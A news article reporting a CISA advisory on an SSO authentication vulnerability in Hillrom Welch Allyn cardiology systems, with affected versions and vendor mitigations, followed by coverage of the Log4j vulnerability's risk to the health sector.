CISA Warns of Authentication Vulnerabilities in Cardiology Products

The Cybersecurity and Infrastructure Security Agency (CISA) released a medical advisory warning healthcare organizations of authentication vulnerabilities associated with certain Hillrom Welch Allyn cardiology products. If successfully exploited, threat actors may be able to access privileged accounts.

Hillrom reported the vulnerabilities to CISA and plans to release software updates in their next software release, the advisory explained.

The following cardiology products are impacted when configured to use single sign-on (SSO):

• Welch Allyn Q-Stress Cardiac Stress Testing System: Versions 6.0.0 through 6.3.1
• Welch Allyn X-Scribe Cardiac Stress Testing System: Versions 5.01 through 6.3.1
• Welch Allyn Diagnostic Cardiology Suite: Version 2.1.0
• Welch Allyn Vision Express: Versions 6.1.0 through 6.4.0
• Welch Allyn H-Scribe Holter Analysis System: Versions 5.01 through 6.4.0
• Welch Allyn R-Scribe Resting ECG System: Versions 5.01 through 7.0.0
• Welch Allyn Connex Cardio: Versions 1.0.0 through 1.1.1

When configured to use SSO, the vulnerability allows the application to accept manual entry of any active directory (AD) account provisioned in the application without requiring a password. As a result, threat actors can gain access to the application as the supplied AD account with all privileges.

Until Hillrom releases software updates, it recommends that organizations using its cardiology products disable the SSO feature in the Modality Manager Configuration settings. Users should also upgrade to the latest product versions as soon as the new software updates are released.

In addition, Hillrom recommended that devices users apply authentication controls for server access and apply adequate network and physical security controls.

CISA urged users to minimize network exposure and ensure that the devices are not accessible from the internet. Additionally, CISA suggested that users locate control system networks and put remote devices behind firewalls.

“Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents,” the advisory continued.

“No known public exploits specifically target this vulnerability. This vulnerability has a high attack complexity.”

CISA also recently released an advisory and accompanying website for newly discovered extremely severe Apache Log4j vulnerabilities. Threat actors could potentially exploit Log4j and execute arbitrary code on a compromised system or device. Researchers first discovered the remote code execution (RCE) vulnerability in November. However, proof-of-concept exploit code has been circulating on social media recently, making the vulnerability a higher priority.

US cybersecurity officials have only observed low-impact attacks from the vulnerabilities so far as of December 15, Reuters reported. Most of the attacks have consisted of threat actors seeking to exploit computing power to mine cryptocurrency.

However, the threat is still evolving, and it is likely that it will continue to pose a risk to a variety of sectors. A patch has been available since December 6, but it can be difficult to ensure that every organization using the extremely common Java framework has successfully patched their systems.

“The exact extent to which Log4j is deployed throughout the health sector is unknown. It is a common application, utilized by many enterprises and cloud applications including several large and well-known vendors,” the Health Sector Cybersecurity Coordination Center (HC3) stated in its sector alert.

“Therefore, it’s highly likely that the health sector is impacted by this vulnerability, and possibly to a large-scale extent. Log4j is known to be a component in many software platforms, some of which are part of cloud services.”